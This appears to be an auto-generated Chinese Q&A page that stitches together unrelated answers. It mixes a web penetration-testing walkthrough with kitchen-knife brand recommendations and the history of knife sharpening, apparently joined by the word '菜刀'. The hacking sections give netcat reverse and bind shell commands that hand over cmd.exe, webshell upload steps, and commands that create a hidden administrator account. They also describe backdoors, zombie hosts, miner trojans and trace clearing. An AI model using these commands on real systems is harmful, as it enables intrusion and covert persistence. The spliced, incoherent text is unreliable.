本文目录一览:
- 1、一个完整的渗透测试流程,分为那几块,每一块有哪些内容
- 2、什么菜刀锋利又耐用?品牌推荐
- 3、web渗透是什么?
- 4、哪位达人有免费强大的网站扫描的工具,包括扫网站有没有sql注入漏洞,弱口令,大马等等,泣血相告啊!感谢
- 5、网站渗透测试用什么工具好
- 6、为什么叫磨剪子戗菜刀
一个完整的渗透测试流程,分为那几块,每一块有哪些内容
包含以下几个流程:
信息收集
第一步做的就是信息收集,根据网站URL可以查出一系列关于该网站的信息。通过URL我们可以查到该网站的IP、该网站操作系统、脚本语言、在该服务器上是否还有其他网站等等一些列的信息。
漏洞探测
当我们收集到了足够多的信息之后,我们就要开始对网站进行漏洞探测了。探测网站是否存在一些常见的Web漏洞,比如:SQL注入 。
漏洞利用
探测到了该网站存在漏洞之后,就要对该漏洞进行利用了。不同的漏洞有不同的利用工具,很多时候,通过一个漏洞我们很难拿到网站的webshell,我们往往需要结合几个漏洞来拿webshell。
内网渗透
当我们能跟内网主机进行通信后,我们就要开始进行内网渗透了。可以先使用nmap对内网主机进行扫描,探测在线的主机,并且探测其使用的操作系统、开放的端口等信息。
内网中也有可能存在供内网使用的内网服务器,可以进一步渗透拿下其权限。
痕迹清除
达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马。
撰写渗透测试保告
在完成了渗透测试之后,就需要对这次渗透测试撰写渗透测试报告了。明确的写出哪里存在漏洞,以及漏洞修补的方法。以便于网站管理员根据我们的渗透测试报告修补这些漏洞和风险,防止被黑客攻击。
什么菜刀锋利又耐用?品牌推荐
菜刀在我们的厨房中是必不可少的一种厨房用具,那么现在市面上售卖的菜刀所使用的材质都各不相同,种类不同,而且现在的工艺也比较发达,不仅能够保证菜刀的使用性能,还能够保证它的美观程度。在购买菜刀时,大家一定比较关注菜刀的耐用程度以及锋利程度,那么下面小编就具体为大家介绍一下,哪些品牌的菜刀比较锋利也比较耐用?
1、Zwilling双立人(上海双立人亨克斯有限公司)
始于1731年德国,享誉全球的家用及专业刀具品牌,专业高档厨房用具品牌/美甲及发剪生产商。
2、张小泉(杭州张小泉集团有限公司)
始于1663年,中华老字号,我国手工业的传统名牌,非物质文化遗产,国内制剪行业领先企业。
3、王麻子(北京栎昌王麻子工贸有限公司)
源于1651年,其传统锻制技艺入选非物质文化遗产,主要从事系列刀具的生产/销售的现代化企业。
4、苏泊尔SUPOR(苏泊尔集团有限公司)
成立于1994年,浙江省著名商标,国内炊具/厨房电器行业领先者,大型炊具研发制造商。
5、爱仕达ASD(浙江爱仕达电器股份有限公司)
始创于1978年,浙江省著名商标,高新技术企业,不粘锅/压力锅行业标准起草单位。
6、永德利(福建永德利刀剪有限公司)
源于1735年,福建省著名商标,以工艺精湛/造型美观的刀剪产品享誉世界,专业制造刀剪集贸易与加工为一体的企业。
7、巧媳妇(阳江市巧媳妇厨业有限公司)
广东省著名商标,广东省名牌产品,高新技术企业,国内刀剪餐厨具行业知名品牌。
8、KYOCERA京瓷(京瓷(中国)商贸有限公司)
始创于1959年日本主要从事办公设备/电子元器件和切削工具等的生产/销售的大型跨国公司。
9、银鹰inwin(广东银鹰实业集团有限公司)
始创于1979年,广东省著名商标,专业生产剪刀/套刀/厨具/多用钳等产品的高新技术企业。
10、十八子作(阳江十八子集团有限公司)
创于1983年,广东省著名商标,高新技术企业,以手工生产碳钢菜刀起家,现为综合性的刀具产家。
这些品牌的菜刀质量都是比较可靠的,而且它们在中国的市场上也具有一定的影响力,得到了消费者的一致认可,大家在购买产品时,可以根据自己的使用习惯,去购买不同形状的菜刀,另外菜刀的价格也参差不齐,建议大家最好亲自去了解一下每一个品牌的产品,之后,再根据自己的实际需求,对比选择,以保证买到的产品适合自己使用。
web渗透是什么?
Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透,以下所说的Web渗透就是黑盒渗透。
Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,提权,内网渗透,留后门,清理痕迹。一般的渗透思路就是看是否有注入漏洞,然后注入得到后台管理员账号密码,登录后台,上传小马,再通过小马上传大马,提权,内网转发,进行内网渗透,扫描内网c段存活主机及开放端口,看其主机有无可利用漏洞(nessus)端口(nmap)对应服务及可能存在的漏洞,对其利用(msf)拿下内网,留下后门,清理痕迹。或者看是否有上传文件的地方,上传一句话木马,再用菜刀链接,拿到数据库并可执行cmd命令,可继续上大马.........思路很多,很多时候成不成功可能就是一个思路的问题,技术可以不高,思路一定得骚。
信息收集
信息收集是整个流程的重中之重,前期信息收集的越多,Web渗透的成功率就越高。
DNS域名信息:通过url获取其真实ip,子域名(Layer子域名爆破机),旁站(K8旁站,御剑1.5),c段,网站负责人及其信息(whois查询)
整站信息:服务器操作系统、服务器类型及版本(Apache/Nginx/Tomcat/IIS)、数据库类型(Mysql/Oracle/Accees/Mqlserver)、脚本类型(php/jsp/asp/aspx)、CMS类型;
网站常见搭配为:
ASP和ASPX:ACCESS、SQLServer
PHP:MySQL、PostgreSQL
JSP:Oracle、MySQL
敏感目录信息(御剑,dirbust)
开放端口信息(nmp)
漏洞扫描
利用AWVS,AppScan,OWASP-ZAP,等可对网站进行网站漏洞的初步扫描,看其是否有可利用漏洞。
常见漏洞:
SQL注入
XSS跨站脚本
CSRF跨站请求伪造
XXE(XML外部实体注入)漏洞
SSRF(服务端请求伪造)漏洞
文件包含漏洞
文件上传漏洞
文件解析漏洞
远程代码执行漏洞
CORS跨域资源共享漏洞
越权访问漏洞
目录遍历漏洞和任意文件读取/下载漏洞
漏洞利用
用工具也好什么也好对相应漏洞进行利用
如:
Sql注入(sqlmap)
XSS(BEEF)
后台密码爆破(burp)
端口爆破(hydra)
提权
获得shell之后我们权限可能很低,因此要对自己提权,可以根据服务器版本对应的exp进行提权,对于Windows系统也可看其补丁对应漏洞的exp进行提权
内网渗透
首先进行端口转发可用nc
nc使用方法:
反向连接
在公网主机上进行监听:
nc-lvp 4444
在内网主机上执行:
nc-e cmd.exe 公网主机ip4444
成功之后即可得到一个内网主机shell
正向连接
远程主机上执行:
nc-l -p 4444 -t -e cmd.exe
本地主机上执行:
nc-vv 远程主机ip4444
成功后,本地主机即可远程主机的一个shell
然后就是对内网进行渗透了,可以用主机漏洞扫描工具(nessus,x-scan等)进行扫描看是否有可用漏洞,可用msf进行利用,或者用nmap扫描存活主机及开放端口,可用hydra进行端口爆破或者用msf对端口对应漏洞得到shell拿下内网留后门
留后门
对于网站上传一句话木马,留下后门
对于windows用户可用hideadmin创建一个超级隐藏账户
手工:
netuser test$ 123456 /add
netlocalgroup administrators test$ /add
这样的话在cmd命令中看不到,但在控制面板可以看到,还需要改注册表才能实现控制版面也看不到,太过麻烦,不多赘述,所以还是用工具省心省力。
哪位达人有免费强大的网站扫描的工具,包括扫网站有没有sql注入漏洞,弱口令,大马等等,泣血相告啊!感谢
如果你是学习网页渗透,SHELL建议你学习下,工具再多不会使用也是白搭,现在流行工具,啊D,菜刀,名小子,都是流行工具,就看个人技术了,,工具不在多少
网站渗透测试用什么工具好
可以试试北极熊扫描器,这款软件支持的功能很多,可以满足新手对网站的检测需要,同时还可以检测内网安全。在国内来说应该很少有第二个那么好的啦
为什么叫磨剪子戗菜刀
叫磨剪子戗菜刀的原因
1、因为剪子的刃口要求是陡峭的,所以用磨的。菜刀的刃口要求是薄而光滑的(无厚才能入有间),所以要用工具铲平削薄,戗在这里是镗铲的意思,就是用一种特制的工具(钢制的类似于木工的推子)把菜刀表面铲平。
2、由于以前的菜刀是手工打制,表面坑坑洼洼,刃口斜面不平,用刀时不方便,所以要铲平或磨光。
扩展资料
磨剪子:磨剪刀还是挺有难度的,至少比磨刀要难些。剪刀是两片,磨时剪刃与磨石的角度、剪刀中轴的松紧,都有相当的关系。剪刃两片合在一起后,刀尖对齐,松紧适度,紧而不涩,松而不旷。用破布条试验刃口,腕臂不叫劲,轻轻一剪,布条迎刃而断,方合规格。
一般人自己磨菜刀,也能磨快,但磨起剪刀来,则多少要有点窍门,虽然用不着什么力学、数学,可您磨出的剪刀,剪东西肯定打滑。磨刀人磨出的剪刀,虽达不到小说里写的“吹毛立断”的神奇效果,但将刃口放在指甲上,只需轻轻推一下,定能削下一小片指甲来。
镪菜刀:家用菜刀时间长了刃部即钝,就需要镪薄,说句文话叫锋利,俗话就叫“快”了。镪菜刀很讲究,先要看刀口,钢是软还是硬,硬的要用砂轮打,软的用抢刀抢,然后完了再用磨刀石磨。镪刀的工具是一根尺把长的铁杆,两头有横扶手,铁杆中间镶一把优质钢的镪刀,用它将刀的两刃刮薄,再磨锋利。
说得通俗些,这把镪刀,就是个铁刨子。也有的工匠用手摇砂轮代替镪刀,省力,薄厚均匀,但内行人说,用砂轮磨刀刃,刀身遇热退火,会减弱钢性。刀铲削完了,就在磨刀石上磨。一面磨一面往刀上淋上清水。磨刀人磨一阵,就用手指在刀刃上轻轻刮一下,又眯着眼看看刀锋。一把钝口的菜刀,在磨刀人的手里,只需一根烟功夫,就改变了面貌。
参考资料
磨剪子镪菜刀_百度百科